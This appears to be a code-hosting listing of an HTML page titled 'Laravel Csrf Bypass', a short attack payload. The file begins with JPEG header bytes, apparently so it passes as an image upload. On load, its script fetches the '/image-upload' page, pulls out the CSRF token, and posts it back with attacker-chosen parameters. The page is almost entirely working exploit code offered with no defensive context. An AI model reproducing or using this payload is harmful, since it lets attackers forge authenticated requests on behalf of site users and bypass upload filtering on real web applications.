52 lines
1.6 KiB
HTML
52 lines
1.6 KiB
HTML
ÿØÿà<html>
|
|
<head>
|
|
<title>Laravel Csrf Bypass</title>
|
|
</head>
|
|
<body>
|
|
<script>
|
|
function submitFormWithTokenJS(token) {
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST", POST_URL, true);
|
|
|
|
// Send the proper header information along with the request
|
|
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
|
|
|
// This is for debugging and can be removed
|
|
xhr.onreadystatechange = function() {
|
|
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
|
|
console.log(xhr.responseText);
|
|
}
|
|
}
|
|
//
|
|
xhr.send("_token=" + token + "&desiredParameter=desiredValue");
|
|
}
|
|
|
|
function getTokenJS() {
|
|
var xhr = new XMLHttpRequest();
|
|
// This tels it to return it as a HTML document
|
|
xhr.responseType = "document";
|
|
// true on the end of here makes the call asynchronous
|
|
//Edit the path as you want
|
|
xhr.open("GET", "/image-upload", true);
|
|
xhr.onload = function (e) {
|
|
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
|
|
// Get the document from the response
|
|
page = xhr.response
|
|
// Get the input element
|
|
input = page.getElementsByTagName("input")[0];
|
|
// Show the token
|
|
alert("The token is: " + input.value);
|
|
// Use the token to submit the form
|
|
submitFormWithTokenJS(input.value);
|
|
}
|
|
};
|
|
// Make the request
|
|
xhr.send(null);
|
|
}
|
|
getTokenJS();
|
|
|
|
var POST_URL="/"
|
|
getTokenJS();
|
|
|
|
</script>
|
|
</html> |